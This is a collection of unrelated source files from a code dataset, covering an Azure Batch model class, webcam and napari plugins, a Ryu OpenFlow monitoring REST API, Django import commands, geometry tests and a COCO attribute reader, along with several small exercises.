# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class PoolEndpointConfiguration(Model):
"""The endpoint configuration for a pool.
:param inbound_nat_pools: A list of inbound NAT pools that can be used to
address specific ports on an individual compute node externally. The
maximum number of inbound NAT pools per Batch pool is 5. If the maximum
number of inbound NAT pools is exceeded the request fails with HTTP status
code 400.
:type inbound_nat_pools: list[~azure.batch.models.InboundNATPool]
"""
_validation = {
'inbound_nat_pools': {'required': True},
}
_attribute_map = {
'inbound_nat_pools': {'key': 'inboundNATPools', 'type': '[InboundNATPool]'},
}
def __init__(self, inbound_nat_pools):
super(PoolEndpointConfiguration, self).__init__()
self.inbound_nat_pools = inbound_nat_pools
| StarcoderdataPython |
1791183 | <filename>10codons.py
#!/usr/bin/env python3
# Define Variables
dna = 'ATAGCGAATATCTCTCATGAGAGGGAA'
s = len(dna)
# Loop
for i in range(0,s,3):
print(dna[i:i+3])
print('End of Reading Frame')
| StarcoderdataPython |
3380522 | <reponame>CompassMentis/mosaic_tiles
class Settings:
screen_width = 1800
screen_height = 950
tile_width = 40
tile_height = tile_width
factories_centre = 360, 350
factories_circle_radius = 250
factory_circle_radius = 80
spacing = 10
grid_colour = 128, 128, 128
active_grid_colour = 255, 128, 128
selected_grid_colour = 50, 255, 50
grid_line_width = 2
opponent_area_location = 1300, 50
player_area_location = 400, 450
player_area_multiplier = 1.8
area_height = (5 + 2) * tile_height + spacing
pattern_area_width = (5 + 0.2) * tile_width + spacing
floor_tile_scores_font_size = 24
floor_tile_scores_spacing = 8
floor_tile_scores_colour = 90, 90, 90 | StarcoderdataPython |
3244143 | <gh_stars>0
import cv2
def fool_proof_webcam():
# Create a named window
# This window will be called by its name, hence the variable
window_name = "Live Video Feed"
cv2.namedWindow(window_name)
# Get first available camera : index=0 (int)
cap = cv2.VideoCapture(0)
# Check if video capturing was initialized
# Fool-proof method, yet not necessary
# frame : check if a frame has been grabbed (boolean)
# frame : frame from camera (np.ndarray)
if cap.isOpened():
ret, frame = cap.read()
else:
ret = False
while ret:
ret, frame = cap.read()
# Convert frame from BGR to Grayscale
output = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cv2.imshow(window_name, output)
# Wait for key event at each millisecond (delay = 1)
# waitKey returns ord() of pressed key
# 27: ASCII code for ESC = ord(ESC)
if cv2.waitKey(1) == 27:
break
# Destroy window and release camera
cv2.destroyWindow(window_name)
cap.release()
def simple_webcam():
# Capture
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
cv2.imshow("Webcam", frame)
# Update each 30 ms
# Retrieve 8 least significant bits from code (0-255)
k = cv2.waitKey(30) & 0xFF
# Loop will only break by pressing 'q'
if k == ord("q"):
print(k)
break
cv2.destroyAllWindows()
cap.release()
if __name__ == "__main__":
fool_proof_webcam()
simple_webcam()
| StarcoderdataPython |
3347731 | <reponame>caoxiaoyue/PyAutoFit
import pytest
from autofit.database.migration import Step, Migrator
@pytest.fixture(
name="step_1"
)
def make_step_1():
return Step(
"INSERT INTO test (id) VALUES (1)"
)
@pytest.fixture(
name="step_2"
)
def make_step_2():
return Step(
"INSERT INTO test (id) VALUES (2)"
)
@pytest.fixture(
name="migrator"
)
def make_migrator(
step_1,
step_2
):
return Migrator(
step_1,
step_2
)
@pytest.fixture(
name="revision_1"
)
def make_revision_1(migrator):
return list(
migrator.revisions
)[0]
@pytest.fixture(
name="revision_2"
)
def make_revision_2(migrator):
return list(
migrator.revisions
)[1]
| StarcoderdataPython |
4802679 | <gh_stars>1-10
from collections import defaultdict
import time
from django.core.management.base import BaseCommand
import csv
import shapefile
class CSVImportCommand(BaseCommand):
help = 'Import data from a CSV file'
    def __init__(self, skip_header=False, encoding=None):
        super().__init__()
        self.skip_header = skip_header
        self.encoding = encoding
def add_arguments(self, parser):
parser.add_argument('csv_file', type=str)
def process_row(self, row):
pass
def handle(self, *args, **options):
csv_file_name = options.get('csv_file')
if csv_file_name:
with open(
csv_file_name,
newline='', encoding=self.encoding) as csvfile:
reader = csv.reader(csvfile, delimiter=',', quotechar='"')
if self.skip_header:
next(reader)
outcome_counts = defaultdict(int)
start_time = time.time()
for count, row in enumerate(reader):
outcome = self.process_row(row)
outcome_counts[outcome or 'processed'] += 1
if count % 100 == 0:
print_outcome_counts_and_rate(
outcome_counts, start_time)
class ShapefileImportCommand(BaseCommand):
help = 'Import data from a *.shp file'
def add_arguments(self, parser):
parser.add_argument('shp_filename', type=str, nargs='+')
def process_record(self, record):
pass
def handle(self, *args, **options):
shp_filenames = options['shp_filename']
outcome_counts = defaultdict(int)
start_time = time.time()
for shp_filename in shp_filenames:
self.process_shapefile(shp_filename,
outcome_counts,
start_time)
def process_shapefile(self, shp_filename, outcome_counts, start_time):
print('Processing shapefile {}'.format(shp_filename))
shp_reader = shapefile.Reader(shp_filename)
for count, record in enumerate(shp_reader.iterShapeRecords()):
if record.shape.shapeType == shapefile.NULL:
outcome_counts['no shapefile'] += 1
continue
outcome = self.process_record(*record.record,
record.shape.__geo_interface__)
outcome_counts[outcome or 'processed'] += 1
if count % 100 == 0:
print_outcome_counts_and_rate(outcome_counts, start_time)
| StarcoderdataPython |
1627451 | <filename>examples/streamtube_demo1.py<gh_stars>0
#!/usr/bin/env python
# Example taken from:
# http://www.mathworks.com/access/helpdesk/help/techdoc/ref/streamtube.html
from scitools.easyviz import *
from scipy import io
wind = io.loadmat('wind_matlab_v6.mat')
x = wind['x']
y = wind['y']
z = wind['z']
u = wind['u']
v = wind['v']
w = wind['w']
sx,sy,sz = ndgrid([80]*4,seq(20,50,10),seq(0,15,5),sparse=False)
setp(show=False)
streamtube(x,y,z,u,v,w,sx,sy,sz)
daspect([1,1,1])
view(3)
axis('tight')
shading('interp')
#camlight(); lighting('gouraud')
setp(show=True)
show()
figure()
# alternative syntax:
streamtube(x,y,z,u,v,w,sx,sy,sz,
daspect=[1,1,1],
view=3,
axis='tight',
shading='interp')
raw_input('Press Return key to quit: ')
#hardcopy('tmp_streamtube1.eps')
#hardcopy('tmp_streamtube1.png')
| StarcoderdataPython |
122604 | from django.db import models
from datetime import date
class TestModel(models.Model):
    # Pass the callable (not its result) so "today" is evaluated each time a
    # row is created, rather than once when the module is imported.
    date = models.DateField(default=date.today)
| StarcoderdataPython |
4834316 | from todo.constants import COMMANDS
from todo.parser.base import BaseParser
class InitializeConfigParser(BaseParser):
"""
usage: td init-config
td ic
initialize config
optional arguments:
-h, --help show this help message and exit
"""
command = COMMANDS.INITIALIZE_CONFIG
| StarcoderdataPython |
1696795 | import logging
import json
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller import dpset
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.exception import RyuException
from ryu.ofproto import ofproto_v1_3
from ryu.lib import ofctl_v1_3
from ryu.app.wsgi import ControllerBase
from ryu.app.wsgi import Response
from ryu.app.wsgi import WSGIApplication
LOG = logging.getLogger('ryu.app.ofctl_rest')
# supported ofctl versions in this restful app
supported_ofctl = {ofproto_v1_3.OFP_VERSION: ofctl_v1_3}
class CommandNotFoundError(RyuException):
message = 'No such command : %(cmd)s'
class PortNotFoundError(RyuException):
message = 'No such port info: %(port_no)s'
def monitor_method(method):
def wrapper(self, req, dpid, *args, **kwargs):
# Get datapath instance from DPSet
try:
dp = self.dpset.get(int(str(dpid), 0))
except ValueError:
LOG.exception('Invalid dpid: %s', dpid)
return Response(status=400)
if dp is None:
LOG.error('No such Datapath: %s', dpid)
return Response(status=404)
# Check OpenFlow 1.3 support
try:
ofctl = supported_ofctl.get(dp.ofproto.OFP_VERSION)
except KeyError:
LOG.exception('Unsupported OF version: %s',
dp.ofproto.OFP_VERSION)
return Response(status=501)
# Invoke MonitorController method
try:
ret = method(self, req, dp, ofctl, *args, **kwargs)
return Response(content_type='application/json',
body=json.dumps(ret))
except ValueError:
LOG.exception('Invalid syntax: %s', req.body)
return Response(status=400)
except AttributeError:
LOG.exception('Unsupported OF request in this version: %s',
dp.ofproto.OFP_VERSION)
return Response(status=501)
return wrapper
class MonitorController(ControllerBase):
def __init__(self, req, link, data, **config):
super(MonitorController, self).__init__(req, link, data, **config)
self.dpset = data['dpset']
self.waiters = data['waiters']
def get_switches(self, req, **_kwargs):
dps = list(self.dpset.dps.keys())
body = json.dumps(dps)
return Response(content_type='application/json', body=body)
@monitor_method
def get_sw_details(self, req, dp, ofctl, **kwargs):
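        # ofctl_v1_3 returns stats keyed by dpid (e.g. {"<dpid>": {...}}), so
        # unwrap the single entry and return only the stats body.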
tmp_sw_details = ofctl.get_desc_stats(dp, self.waiters)
sw_id = list(tmp_sw_details.keys())[0]
return tmp_sw_details[sw_id]
@monitor_method
def get_sw_flows(self, req, dp, ofctl, **kwargs):
flow = req.json if req.body else {}
tmp_flows = ofctl.get_flow_stats(dp, self.waiters, flow)
        sw_id = list(tmp_flows.keys())[0]
        return tmp_flows[sw_id][0]
#return ofctl.get_flow_stats(dp, self.waiters, flow)
@monitor_method
def get_flows_stats(self, req, dp, ofctl, **kwargs):
flow = req.json if req.body else {}
return ofctl.get_aggregate_flow_stats(dp, self.waiters, flow)
@monitor_method
def get_table_stats(self, req, dp, ofctl, **kwargs):
return ofctl.get_table_stats(dp, self.waiters)
@monitor_method
def get_sw_ports(self, req, dp, ofctl, **kwargs):
tmp_sw_port = ofctl.get_port_stats(dp, self.waiters, None)
sw_id = list(tmp_sw_port.keys())[0]
return tmp_sw_port[sw_id]
#return ofctl.get_port_stats(dp, self.waiters, port)
@monitor_method
def get_sw_port(self, req, dp, ofctl, port=None, **kwargs):
tmp_sw_port = ofctl.get_port_stats(dp, self.waiters, port)
sw_id = list(tmp_sw_port.keys())[0]
return tmp_sw_port[sw_id][0]
#return ofctl.get_port_stats(dp, self.waiters, None)
@monitor_method
def get_sw_ports_details(self, req, dp, ofctl, **kwargs):
return ofctl.get_port_desc(dp, self.waiters, None)
@monitor_method
def get_sw_port_detail(self, req, dp, ofctl, port, **kwargs):
#return ofctl.get_port_desc(dp, self.waiters, port)
tmp = ofctl.get_port_desc(dp, self.waiters, port)
sw_id = list(tmp.keys())[0]
my_dict = tmp[sw_id]
my_port = int(port)
final_json = {}
LOG.info("MYPORT={}".format(port))
for x in my_dict:
tmp_json = x
LOG.info("PORT={}".format(tmp_json["port_no"]))
if tmp_json["port_no"] == 'LOCAL':
continue
else:
tmp_port = int(tmp_json["port_no"])
if my_port == tmp_port:
LOG.info("TRUE")
return tmp_json
return final_json
class RestMonitorApi(app_manager.RyuApp):
OFP_VERSIONS = [ofproto_v1_3.OFP_VERSION]
_CONTEXTS = {
'dpset': dpset.DPSet,
'wsgi': WSGIApplication
}
def __init__(self, *args, **kwargs):
super(RestMonitorApi, self).__init__(*args, **kwargs)
self.dpset = kwargs['dpset']
wsgi = kwargs['wsgi']
self.waiters = {}
self.data = {}
self.data['dpset'] = self.dpset
self.data['waiters'] = self.waiters
mapper = wsgi.mapper
wsgi.registory['MonitorController'] = self.data
# BASE endpoint URL
path = '/monitor'
# GET /monitor/switches - list all switches
uri = path + '/switches'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_switches',
conditions=dict(method=['GET']))
# GET /monitor/switch/detail/<dpid> - summary details of switch
uri = path + '/switch/{dpid}/details'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_details',
conditions=dict(method=['GET']))
# GET /monitor/switch/flows/<dpid> - aggregate flows stats of switch
uri = path + '/switch/{dpid}/flows'
mapper.connect('monitor', uri,
controller=MonitorController,
action='get_sw_flows',
conditions=dict(method=['GET', 'POST']))
# GET /monitor/switch/<dpid>/ports - all ports stats of switchi
uri = path + '/switch/{dpid}/ports'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_ports',
conditions=dict(method=['GET']))
# GET /monitor/switch/<dpid>/port/<port> - single ports stats of switch
uri = path + '/switch/{dpid}/port/{port}'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_port',
conditions=dict(method=['GET']))
# GET /monitor/switch/<dpid>/portdetails - port details of switch
uri = path + '/switch/{dpid}/portdetails'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_ports_details',
conditions=dict(method=['GET']))
uri = path + '/switch/{dpid}/portdetail/{port}'
mapper.connect('monitor', uri,
controller=MonitorController, action='get_sw_port_detail',
conditions=dict(method=['GET']))
@set_ev_cls([ofp_event.EventOFPStatsReply,
ofp_event.EventOFPDescStatsReply,
ofp_event.EventOFPFlowStatsReply,
ofp_event.EventOFPAggregateStatsReply,
ofp_event.EventOFPPortStatsReply,
ofp_event.EventOFPPortDescStatsReply
], MAIN_DISPATCHER)
def stats_reply_handler(self, ev):
msg = ev.msg
dp = msg.datapath
if dp.id not in self.waiters:
return
if msg.xid not in self.waiters[dp.id]:
return
lock, msgs = self.waiters[dp.id][msg.xid]
msgs.append(msg)
flags = dp.ofproto.OFPMPF_REPLY_MORE
if msg.flags & flags:
return
del self.waiters[dp.id][msg.xid]
lock.set()
| StarcoderdataPython |
1749245 | #!/usr/bin/env python
from __future__ import print_function
import sys
import json
import logging
from argparse import ArgumentParser
from util import get_url, post_and_wait, tagmapping
def imageName2id(imageName):
#
url='image/importation?name={0}'.format(imageName)
response = get_url(url)
return response['response'][0]['imageUuid']
def distribute(imageUuid, *deviceIdList):
body = []
for deviceId in deviceIdList:
body.append({"deviceUuid": deviceId, "imageUuid": imageUuid})
url = 'image/distribution'
response = post_and_wait(url, body)
print(response)
taskId = response['id']
detail = get_url('image/task?taskUuid={0}'.format(taskId))
print (json.dumps(detail, indent=2))
def validate(imageUuid, *deviceIdList):
'''
quick check to make sure the image should be distributed to the device
:param imageUuid:
:param deviceIdList:
:return:
'''
image = get_url('image/importation/{0}'.format(imageUuid))
print(image['response']['family'])
for deviceId in deviceIdList:
device = get_url('network-device/{0}'.format(deviceId))
print(device['response']['series'])
if __name__ == "__main__":
parser = ArgumentParser(description='Select options.')
parser.add_argument('--tag', type=str, required=False,
help="devices that match this tag")
parser.add_argument('--image', type=str, required=False,
help="devices that match this tag")
args = parser.parse_args()
deviceIds = tagmapping(args.tag)
imageId = imageName2id(args.image)
validate(imageId, *deviceIds)
distribute(imageId, *deviceIds)
| StarcoderdataPython |
118156 | import requests
import json
from tokens.settings import BLOCKCYPHER_API_KEY
def register_new_token(email, new_token, first=None, last=None):
assert new_token and email
post_params = {
"first": "MichaelFlaxman",
"last": "TestingOkToToss",
"email": "<EMAIL>",
"token": new_token,
}
url = 'https://api.blockcypher.com/v1/tokens'
get_params = {'token': BLOCKCYPHER_API_KEY}
r = requests.post(url, data=json.dumps(post_params), params=get_params,
verify=True, timeout=20)
assert 'error' not in json.loads(r.text)
return new_token
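# Illustrative call (all values below are placeholders):
#
#   register_new_token('[email protected]', uuid.uuid4().hex,
#                      first='Jane', last='Doe')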
| StarcoderdataPython |
186522 | #!/usr/bin/env python
'''
0104 89C3 MOV BX,AX
0106 D1E8 SHR AX,1
010C 91 XCHG AX,CX
010D BA0102 MOV DX,0201
0110 D1C2 ROL DX,1
0112 D1EB SHR BX,1
0114 D1D1 RCL CX,1
0116 38DE CMP DH,BL
0118 7EF6 JLE 0110
011A 38D3 CMP BL,DL
011C 7E06 JLE 0124
0120 D1D1 RCL CX,1
0124 28D4 SUB AH,DL
0126 4A DEC DX
0127 20D0 AND AL,DL
0129 21F2 AND DX,SI
012B 38C2 CMP DL,AL
012D 18E3 SBB BL,AH
'''
# Emulated flags and registers
carry = 0
equal = 0
less = 0
greater = 0
ax = 0
bx = 0
cx = 0
dx = 0
def and8(x, y):
    # Bitwise AND of two 8-bit values given as binary strings.
    x1 = ('00000000' + x)[-8:]
    y1 = ('00000000' + y)[-8:]
    return format(int(x1, 2) & int(y1, 2), '08b')
def sbb(x):
pass
def dec(x):
    return x - 1
def sub(x,y):
bl = x-y
def jmp1():
bx = ax
ax = shr(ax)
cx = ax
dx = 201
dx = rol(dx)
bx = shr(bx)
cx = rcl(cx)
carry = 0
cmp8()
if less == 1 or equal == 1:
jmp1()
cmp8()
if less == 1 or equal == 1:
jmp2()
cx = rcl(cx)
jmp2()
def jmp2():
sub()
dx = dec(dx)
#and
#and
cmp8()
def cmp8(x, y):
if x == y:
equal = 1
if x < y:
less = 1
def ror(x):
pass
def rol(x):
return (x[-1] + x)[0:-1]
def shr(x):
return x >> 1
def rcl(x):
c = carry
carry = x[0]
return (x+c)[1:]
if __name__ == "__main__":
    ax = int(input())
jmp1()
| StarcoderdataPython |
127608 | from ground.base import (Location,
Relation)
from hypothesis import given
from orient.planar import (point_in_multisegment,
point_in_polygon,
point_in_segment,
segment_in_multisegment,
segment_in_polygon,
segment_in_segment)
from clipping.planar import (complete_intersect_multisegment_with_polygon,
intersect_multisegment_with_polygon)
from tests.utils import (PolygonWithMultisegment,
are_compounds_similar,
compound_to_linear,
is_non_shaped,
pack_non_shaped,
reverse_compound_coordinates,
reverse_multisegment,
reverse_multisegment_coordinates,
reverse_multisegment_endpoints,
reverse_polygon_border,
reverse_polygon_coordinates,
reverse_polygon_holes,
reverse_polygon_holes_contours,
segments_relation,
to_contour_segments,
to_polygon_contours,
to_sorted_segment)
from . import strategies
@given(strategies.polygons_with_multisegments)
def test_basic(polygon_with_multisegment: PolygonWithMultisegment) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert is_non_shaped(result)
@given(strategies.polygons_with_multisegments)
def test_properties(polygon_with_multisegment: PolygonWithMultisegment
) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
result_points, result_segments = pack_non_shaped(result)
assert all(point_in_multisegment(point, multisegment) is Location.BOUNDARY
for point in result_points)
assert all(point_in_polygon(point, polygon) is Location.BOUNDARY
for point in result_points)
assert all(any(point_in_segment(point, segment) is Location.BOUNDARY
for point in result_points)
or any(segments_relation(segment, result_segment)
is Relation.TOUCH
for result_segment in result_segments)
for segment in multisegment.segments
if (segment_in_polygon(segment, polygon)
is Relation.TOUCH
and all(
segments_relation(segment, contour_segment)
in (Relation.CROSS, Relation.DISJOINT,
Relation.TOUCH)
for contour in to_polygon_contours(polygon)
for contour_segment in to_contour_segments(contour))))
assert all(segment_in_multisegment(result_segment, multisegment)
in (Relation.EQUAL, Relation.COMPONENT)
for result_segment in result_segments)
assert all(segment_in_polygon(result_segment, polygon)
in (Relation.COMPONENT, Relation.ENCLOSED, Relation.WITHIN)
for result_segment in result_segments)
assert all(to_sorted_segment(segment) in result_segments
# in case of cross
or any(segment_in_segment(result_segment, segment)
is Relation.COMPONENT
for result_segment in result_segments)
for segment in multisegment.segments
if (segment_in_polygon(segment, polygon)
in (Relation.CROSS, Relation.COMPONENT, Relation.ENCLOSED,
Relation.WITHIN)))
@given(strategies.polygons_with_multisegments)
def test_connection_with_intersect(polygon_with_multisegment
: PolygonWithMultisegment) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert (compound_to_linear(result)
== intersect_multisegment_with_polygon(multisegment, polygon))
@given(strategies.polygons_with_multisegments)
def test_reversals(polygon_with_multisegment: PolygonWithMultisegment
) -> None:
polygon, multisegment = polygon_with_multisegment
result = complete_intersect_multisegment_with_polygon(multisegment,
polygon)
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_border(polygon))
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_holes(polygon))
assert result == complete_intersect_multisegment_with_polygon(
multisegment, reverse_polygon_holes_contours(polygon))
assert result == complete_intersect_multisegment_with_polygon(
reverse_multisegment(multisegment), polygon)
assert result == complete_intersect_multisegment_with_polygon(
reverse_multisegment_endpoints(multisegment), polygon)
assert are_compounds_similar(
result, reverse_compound_coordinates(
complete_intersect_multisegment_with_polygon(
reverse_multisegment_coordinates(multisegment),
reverse_polygon_coordinates(polygon))))
| StarcoderdataPython |
1714839 | # Copyright 2019 Splunk, Inc.
#
# Use of this source code is governed by a BSD-2-clause-style
# license that can be found in the LICENSE-BSD2 file or at
# https://opensource.org/licenses/BSD-2-Clause
import random
from jinja2 import Environment
from .sendmessage import *
from .splunkutils import *
from .timeutils import *
import pytest
env = Environment()
testdata = [
"{{mark}}{{ bsd }} {{ host }} forward: in:ether1 out:bridge, src-mac 26:5a:4c:57:6e:cc, proto TCP (SYN), 192.168.1.196:62583->10.1.0.0:8000, len 64",
]
# Tue, 15 Jun 2021 02:35:28 +1000
@pytest.mark.parametrize("event", testdata)
def test_routeros(record_property, setup_wordlist, setup_splunk, setup_sc4s, event):
host = "test-mrtros-{}-{}".format(
random.choice(setup_wordlist), random.choice(setup_wordlist)
)
dt = datetime.datetime.now(datetime.timezone.utc)
iso, bsd, time, date, tzoffset, tzname, epoch = time_operations(dt)
# Tune time functions
epoch = epoch[:-7]
device_time = dt.strftime("%a, %d %b %Y %H:%M:%S +0000")
mt = env.from_string(event + "\n")
message = mt.render(mark="<132>", bsd=bsd, host=host, device_time=device_time)
sendsingle(message, setup_sc4s[0], setup_sc4s[1][514])
st = env.from_string('search index=netfw _time={{ epoch }} sourcetype="routeros"')
search = st.render(epoch=epoch, host=host)
resultCount, eventCount = splunk_single(setup_splunk, search)
record_property("host", host)
record_property("resultCount", resultCount)
record_property("message", message)
assert resultCount == 1
| StarcoderdataPython |
4840222 | <reponame>CartoDB/bigmetadata<gh_stars>10-100
def copy_from_csv(session, table_name, columns, csv_stream):
'''
Creates a table, loading the data from a .csv file.
:param session: A SQL Alchemy session
:param table_name: Output table name
    :param columns: Dictionary of columns; keys are column names, values are SQL types.
:param csv_stream: A stream that reads a CSV file. e.g: a file or a
:class:`CSVNormalizerStream <lib.csv_stream.CSVNormalizerStream>`
'''
with session.connection().connection.cursor() as cursor:
cursor.execute('CREATE TABLE {output} ({cols})'.format(
output=table_name,
cols=', '.join(['{name} {type}'.format(name=k, type=v) for k, v in columns.items()])
))
cursor.copy_expert(
'COPY {table} ({cols}) FROM stdin WITH (FORMAT CSV, HEADER)'.format(
cols=', '.join(columns.keys()),
table=table_name),
csv_stream)
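# --- Hypothetical usage sketch (added; not part of the original module) ---
# The DSN, table name, column mapping and CSV path below are placeholder assumptions.
if __name__ == '__main__':
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine('postgresql://user:password@localhost/observatory')  # placeholder DSN
    session = sessionmaker(bind=engine)()
    columns = {'geoid': 'TEXT', 'total_pop': 'NUMERIC'}  # keys are column names, values are SQL types
    with open('input.csv') as csv_stream:  # CSV header must match the column names
        copy_from_csv(session, 'demo_table', columns, csv_stream)
    session.commit()  # the COPY runs on the session's raw connection, so commit through the session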
| StarcoderdataPython |
3260886 | <reponame>haesleinhuepf/napari-webcam<gh_stars>0
"""
This module is an example of a barebones QWidget plugin for napari
It implements the ``napari_experimental_provide_dock_widget`` hook specification.
see: https://napari.org/docs/dev/plugins/hook_specifications.html
Replace code below according to your needs.
"""
import time
from napari._qt.qthreading import thread_worker
from napari_plugin_engine import napari_hook_implementation
from qtpy.QtWidgets import QWidget, QHBoxLayout, QPushButton, QLineEdit, QSpinBox, QCheckBox, QGridLayout, QLabel
from magicgui import magic_factory
import cv2
from ._function import acquire
from napari_tools_menu import register_dock_widget
@register_dock_widget(menu="Acquisition > Webcam stream")
class ContinuousAcquisition(QWidget):
def __init__(self, napari_viewer):
super().__init__()
self.viewer = napari_viewer
self.btn = QPushButton("Start Acquisition")
self.btn.clicked.connect(self._on_click)
self.camera_index_spinner = QSpinBox()
self.rgb_checkbox = QCheckBox()
self.setLayout(QGridLayout(self))
self.layout().addWidget(QLabel("Camera"), 0, 0)
self.layout().addWidget(self.camera_index_spinner, 0, 1)
self.layout().addWidget(QLabel("RGB"), 1, 0)
self.layout().addWidget(self.rgb_checkbox, 1, 1)
self.layout().addWidget(self.btn, 2, 1)
#self.layout().addStretch()
self.image_layer = None
self.camera_device = None
self.worker = None
self.acquisition_count = 0
def _on_click(self):
if self.camera_device:
# stop imaging
self.camera_device.release()
self.camera_device = None
self.btn.setText("Start Acquisition")
return
else:
# start imaging
self.acquisition_count += 1
self.camera_device = cv2.VideoCapture(self.camera_index_spinner.value())
self.btn.setText("Stop Acquisition")
# Multi-threaded interaction
# inspired by https://napari.org/docs/dev/events/threading.html
def update_layer(data):
for name, image in data.items():
if image is not None:
try:
# replace layer if it exists already
self.viewer.layers[name].data = image
except KeyError:
# add layer if not
self.viewer.add_image(
image, name=name, blending='additive'
)
@thread_worker
def yield_acquire_images_forever():
while self.viewer.window.qt_viewer: # loop until napari closes
if self.camera_device:
yield {'image' + str(self.acquisition_count): acquire(keep_connection=True, device=self.camera_device, rgb=self.rgb_checkbox.isChecked())}
time.sleep(0.05)
# Start the imaging loop
if self.worker is None:
self.worker = yield_acquire_images_forever()
self.worker.yielded.connect(update_layer)
self.worker.start()
@napari_hook_implementation
def napari_experimental_provide_dock_widget():
return [ContinuousAcquisition]
| StarcoderdataPython |
34381 | <filename>Lab11/BacktrackingRecursive.py
l = ["+", "-"]  # candidate signs for each gap between consecutive values
def backRec(x):
    # Recursive backtracking: try each sign in the next position, report complete
    # solutions, recurse deeper, then undo the choice before trying the alternative.
    for j in l:
        x.append(j)
        if consistent(x):
            if solution(x):
                solutionFound(x)
            backRec(x)
        x.pop()
def consistent(s):
    # a partial assignment may keep growing while it is shorter than n
    return len(s) < n
def solution(s):
    # s is complete when it holds one sign for each of the n - 1 gaps;
    # it is a solution when the resulting signed sum of the input values is positive
    summ = list2[0]
    if len(s) != n - 1:
        return False
    for i in range(n - 1):
        if s[i] == "-":
            summ -= list2[i + 1]
        else:
            summ += list2[i + 1]
    return summ > 0
def solutionFound(s):
print(s)
n = int(input("Give number: "))
list2 = []
for i in range(n):
list2.append(int(input(str(i) + ":")))
backRec([])
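# Example (hypothetical input, added for illustration): for n = 3 and values [2, 5, 4] the signed
# sums are 2+5+4 = 11, 2+5-4 = 3, 2-5+4 = 1 and 2-5-4 = -7, so backRec([]) prints
# ['+', '+'], ['+', '-'] and ['-', '+'] -- every sign vector whose total stays positive.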
| StarcoderdataPython |
141552 | <reponame>Calebu6214/Neighborhood
from django.test import TestCase
from django.contrib.auth.models import User
from .models import *
import datetime as dt
# Create your tests here.
class neighbourhoodTestClass(TestCase):
def setUp(self):
self.kibra = neighbourhood(neighbourhood='kibra')
def test_instance(self):
self.assertTrue(isinstance(self.kibra,neighbourhood))
def tearDown(self):
neighbourhood.objects.all().delete()
def test_save_method(self):
self.kibra.save_neighbourhood()
jirani = neighbourhood.objects.all()
self.assertTrue(len(jirani)>0)
| StarcoderdataPython |
37603 | <reponame>visinf/style-seqcvae<gh_stars>0
import os
import pickle
import numpy as np
from datasets.config_attrib_selection import attrib_selection
def save_obj(obj, path):
with open(path, 'wb') as f:
pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)
def load_obj(path):
with open(path, 'rb') as f:
return pickle.load(f)
class CocoAttributesReader(object):
def __init__(self, attribs_dir_path: str):
self.attrib_weight_threshold = 0.1
self.attrib_min_appearance = 0
self.attribs_n_max_per_image = 200
# ATTENTION: image2obj_insts, obj_inst2attrib_inst, attrib_inst2attrib_vector still contain elements not appearing in image list
result_read_attributes = self.read_attributes(attribs_dir_path)
self.image_ids = set(result_read_attributes[0])
self.image2obj_insts = result_read_attributes[1]
self.obj_inst2attrib_inst = result_read_attributes[2]
self.attrib_inst2attrib_vector = result_read_attributes[3]
self.ignore_attrib_indices = result_read_attributes[4]
self.attrib_names = result_read_attributes[5]
self.attrib_image_count = result_read_attributes[6]
self.attrib2attrib_inst_count = result_read_attributes[7]
self.n_attribs = len(self.attrib_names)
self.att_counts = np.zeros(self.n_attribs)
for k,v in self.attrib2attrib_inst_count.items():
self.att_counts[k] = v
self.obj_inst2obj_id = load_obj(os.path.join(attribs_dir_path, "obj_inst2obj_id.pkl"))
self.obj_id2obj_name = load_obj(os.path.join(attribs_dir_path, "obj_id2obj_name.pkl"))
def __len__(self) -> int:
return len(self.image_ids)
def __getitem__(self, image_id: int):
obj_insts = self.image2obj_insts[image_id]
#print(obj_insts)
result = []
for obj_inst in obj_insts:
if(obj_inst in self.obj_inst2attrib_inst):
attrib_inst = self.obj_inst2attrib_inst[obj_inst]
try:
attrib_vec = self.attrib_inst2attrib_vector[attrib_inst]
#result.append([obj_inst, attrib_vec]) # attribs as sparse arrays
result.append([obj_inst, list(np.nonzero(attrib_vec)[0])]) # attribs as indizes
#if(attrib_vec.sum() > 0):
#result.append([obj_inst, [self.attrib_names[x] for x in np.nonzero(attrib_vec)[0]]]) # attribs as strings
#result.append([obj_inst, [[self.attrib_names[x], attrib_vec[x]] for x in np.nonzero(attrib_vec)[0]]])
except:
pass
return result
def filter_duplicates(self, result):
result_filtered = {}
for obj in result:
if(obj[0] not in result_filtered):
result_filtered[obj[0]] = obj[1]
else:
result_filtered_atts = [a[0] for a in result_filtered[obj[0]]]
for attrib in obj[1]:
try:
idx = result_filtered_atts.index(attrib[0])
result_filtered[obj[0]][idx][1] = max(result_filtered[obj[0]][idx][1], attrib[1])
except ValueError:
result_filtered[obj[0]].append(attrib)
return [[key, value] for key, value in result_filtered.items()]
def read_attributes(self, attribs_dir_path, ignore_attrib_indices=None):
attrib_inst2attrib_vector = load_obj(os.path.join(attribs_dir_path, "attrib_inst2attrib_vector.pkl"))
attrib_inst2obj_inst = load_obj(os.path.join(attribs_dir_path, "attrib_inst2obj_inst.pkl"))
obj_inst2attrib_inst = load_obj(os.path.join(attribs_dir_path, "obj_inst2attrib_inst.pkl"))
obj_inst2image = load_obj(os.path.join(attribs_dir_path, "obj_inst2image.pkl"))
